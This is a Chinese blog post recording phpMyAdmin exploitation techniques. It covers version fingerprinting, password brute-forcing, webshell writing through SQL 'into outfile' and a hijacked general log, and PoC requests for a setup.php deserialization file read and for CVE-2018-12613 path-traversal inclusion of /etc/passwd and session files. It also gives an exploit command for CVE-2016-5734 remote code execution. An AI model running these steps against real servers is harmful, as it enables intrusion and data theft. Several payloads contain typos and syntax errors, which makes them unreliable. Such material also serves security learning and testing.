phpMyAdmin 常见漏洞利用记录

已于 2022-01-29 16:59:40 修改
阅读量2.4k 收藏 8
点赞数
文章标签: 安全
于 2021-11-26 11:29:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/121552272
版权

目录

简介

phpmyadmin版本信息获取

phpmyadmin密码爆破

phpmyadmin文件写入

phpmyadmin日志写shell

phpmyadmin版本漏洞

phpmyadmin 2.x版本反序列化漏洞任意文件读取(wooyun-2016-199433)

CVE-2016-5734 RCE命令执行

CVE-2018-12613 文件包含

结语

简介

        phpMyAdmin 是一 个以 PHP 为基础,以 Web Base 方式架构在网站主机上的 MySQL 的数据库管理工具,让管理者可用 Web 接口管理 MySQL 数据库。借由此 Web 接口可以成为 个简易方式输入繁杂 SQL 语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。
        大的优势在于由于 phpMyAdmin 跟其他 PHP 程式 样在网页服务器上执行, 但是您可以在任何地方使用这些程式产生的 HTML 页面,也就是于远端管理 M ySQL 数据库,方便的建立、修改、删除数据库及资料表。也可借由 phpMyAd min 建立常用的 php 语法,方便编写网页时所需要的 sql 语法正确性。

phpmyadmin版本信息获取

直接phpmyadmin目录后拼接:

readme.php

README

changelog.php

Change

Documetation.html

Documetation.txt
translators.html
只要管理员不删除这些文件,就可以找到一下相关的信息,只是有些文件是需要进入到后台才能打开的。
后台信息获取:

phpmyadmin密码爆破

可以看看有没有存在注入或者利用爆破工具进行爆破进入后台。

推荐工具 :

https://github.com/J1hng/PMAblast

phpmyadmin文件写入

获取绝对路径:
phpinfo();
查看出错页面获取
利用load_file读取配置文件
查看数据库内容
select @@datadir查看数据库路径猜网站绝对路径

5.0版本之后的mysql数据库会自动创建日志文件,那么在服务运行的情况下修改全局变量也可以改变日志文件的存储位置;但是需要对日志的目录具有读写权限。

查看是否具有写权限:

show varlables like 'secure_file_priv';

secure_file_priv的值为null,表示限制mysql不允许导入|导出;

secure_file_priv的值为/var时,表示限制mysql导入|导出只能在/var目录下;

secure_file_priv的值为空白时,表示不对mysql导入|导出做限制;

可以在mysql.ini文件中进行修改。

如果具有写文件权限的话就可以直接写入shell:

select "<?php phpinfo();?>" into outfile "D:\\phpstudy_pro\\www\\test.php";

不过这里需要用双反斜杠,不然会被转义。

phpmyadmin日志写shell

phpmyadmin有一个记录日志的文件,当into outfile被禁用的话还可以利用日志getshell。

默认情况下是关闭的,开启日志记录,然后设置日志记录名称为.php,之后执行sql语句就会被写入到日志中去。

show variables like 'general_log%';

set global general_log='on'; #手动开启日志

set global general_log_file='d:\\phpstudy_pro\\www\\test.php; #修改日志路径

show variables like "general_log%"; #查看是否开启日志并且更改路径

成功写入。

phpmyadmin版本漏洞

phpmyadmin 2.x版本反序列化漏洞任意文件读取(wooyun-2016-199433)

poc:

POST /scripts/setup.php HTTP/1.1

...

action=test$configuration=0:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

CVE-2016-5734 RCE命令执行

影响版本:

phpmyadmin 4.3.0-4.6.2;

php 4.3.0-5.4.6

主要由于将用户输入的信息拼接进preg_replace函数第一个参数中,在php5.4.7之前的版本中。preg_replace存在漏洞,可以使用0进行截断,并将正则模式修改为e,导致命令执行。

kali中自带exp:

searchsploit phpmyadmin

python3 40185.py -u root -p root -d test -c "system(whoami)" http://127.0.0.1/

CVE-2018-12613 文件包含

影响版本:

phpmyadmin 4.8.0-4.8.1

poc:

index.php?target=db_sql.php%253f/../../../../../../../../../../../etc/passwd

or

/?target=tbl_zoom_select.php?/../../../../../../etc/hosts

然后可以执行一些sql语句记录到日志中去,然后包含。

select '<?php phpinfo()?>';

f12在开发者工具找到phpmyadmin的cookie值

访问:

http://ip:port/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../../../../tmp/sess_safjaubfasklfjkasnflasfn6as4d6sa8das5

结语

已无暇顾及过去,要向前走。

Cheng-Ling
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
phpmyadmin scripts/setup.php 反序列化漏洞
千寻的博客
03-21 1726
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中,当在php中创建了一个对象后,可以通过把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。序列化就是将对象的状态信息转为字符串储存起来那么反序列化就是再将这个。
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 3万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
phpMyAdmin4.0文件包含漏洞复现(CVE-2018-12613)
qq_58696478的博客
12-05 145
phpMyAdmin文件包含
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 946
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
phpmyadmin弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1297
phpmyadmin弱口令至getshell 漏洞复现
复现PHPMyAdmin(CVE-2018-12613)漏洞,并利用漏洞实现上传WebShell
qq_54713392的博客
04-20 612
复现PHPMyAdmin(CVE-2018-12613)漏洞 并利用漏洞实现上传WebShell 漏洞描述:   在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 558
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpMyAdmin要嵌入到已有的界面
bjx18356163055的博客
02-13 478
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,
iis7.5+mysql+php配置与漏洞复现
m0_46576302的博客
09-06 928
原理:IIS7.5的漏洞是由于php配置文件中,开启了cgi.fix_pathinfo,而这并不是iis7.5本身的漏洞。
phpMyAdmin漏洞利用安全防范
02-25
但是,如果存在设置的Root密码过于简单,代码泄露Mysql配置等漏洞,通过一些技术手段,99%都能获取网站webshell,有的甚至是服务器权限。phpMyAdmin在一些流行架构中大量使用,例如phpStudy、phpnow、Wammp、Lamp、...
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
phpMyAdmin通过密码漏洞留后门文件
10-17
今天小编就为大家分享一篇关于phpMyAdmin通过密码漏洞留后门文件,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
利用phpmyadmin找回wordpress忘记管理密码
09-29
在这种情况下,我们可以利用phpMyAdmin这个强大的MySQL数据库管理工具来更改WordPress的管理员密码。以下是使用phpMyAdmin找回WordPress忘记管理密码的详细步骤: 1. **确认数据库信息**: 在开始操作前,你需要...
php检测 Phpmyadmin提权漏洞演示
07-21
【压缩包子文件的文件名称列表】:“Phpmyadmin提权漏洞演示.exe”可能是一个执行文件,包含了一个模拟的环境或工具,用于演示如何检测和利用Phpmyadmin的提权漏洞。这个文件可能包含了模拟攻击的步骤、漏洞利用的...
漏洞复现-Phpmyadmin setup.php反序列化漏洞(WooYun-2016-199433)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-04 3680
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpMyAdmin漏洞安全防范
willow_liang的博客
11-28 1111
1.主要功能 数据库在线管理工具 操作数据. 执行mysq|命令 导出和导入数据库 网页版的mysq|管理工具 2.危害 MySQL数据库导出(数据库拖库) 执行导出Webshell 修改数据库 3.phpMyAdmin渗透利用思路 MySQL root密码暴力破解 源代码泄露 读取配置文件 root账号及权限三种方法获取Webshell SQLMAP直连数据库获取权限 社工方法来获取权限 4.phpMyAdmin防范思路 重命名文件夹. 禁止列目录漏洞 设置数据库高强度密
爆破phpmyadmin
m0_51589948的博客
08-08 1159
爆破phpmyadmin 因为是第一次写脚本,所以没有爆破phpmyadmin的思路 后来百度到很多爆破phpmyadmin的脚本,找到了一些思路 大概就是用python构造对phpmyadmin的登录请求,根据登录前后的源码中的一些不同的信息判断是否登录成功,我们又从发送的请求包中获取了请求参数,以及文件头信息·pma_username=roofffffft&pma_password=fffroot&server=1&token=3b88f0df1d082083aae8b4ccc
Web安全——穷举爆破上篇(仅供学习)
钟言的博客
09-02 4447
本篇为Web安全的穷举篇,详细内容包含了二、常见的服务 1、burpsuite 穷举后台密码 2、burpsuite 对 webshell 穷举破解密码3、有 token 防御的网站后台穷举破解密码3.1 burpsuite 设置宏获取 token 对网站后台密码破解3.2 编写脚本获取token 对网站后台密码破解4、针对有验证码后台的穷举方法 4.1 cookie 不存在不验证绕过 4.2 后台登录验证码没销毁进行穷举4.3 网站后台验证码识别穷举密码 5、phpmyadmin 密码穷举 6、一句话等等
phpmyadmin漏洞
07-27
引用\[1\]:根据网上公开的phpMyadmin文件包含漏洞,通过代码审计定位危险函数,然后逐步分析,最终确定payload,并通过本地搭建phpMyadminV4.8.1版本成功进行漏洞复现。实际上该漏洞对于大部分版本的phpMyadmin都生效,因此有使用该系统的需要引起格外的重视,及时修补该漏洞。\[1\]引用\[2\]:文件包含漏洞是指在程序中动态引用了用户可控制的文件,而没有对用户输入进行充分的过滤和验证,导致攻击者可以通过构造恶意的文件路径来读取、执行或者包含任意文件。\[2\]引用\[3\]:在phpMyadmin的大部分版本中都存在文件包含漏洞。\[3\] 问题: phpmyadmin漏洞是什么? 回答: phpMyadmin漏洞是指在phpMyadmin程序中存在的文件包含漏洞。该漏洞允许攻击者通过构造恶意的文件路径来读取、执行或者包含任意文件。这个漏洞对于大部分版本的phpMyadmin都生效,因此使用该系统的用户需要格外重视,并及时修补该漏洞。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* *2* *3* [phpmyadminV4.8.1本地文件包含漏洞复现](https://blog.csdn.net/weixin_64551911/article/details/125609281)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值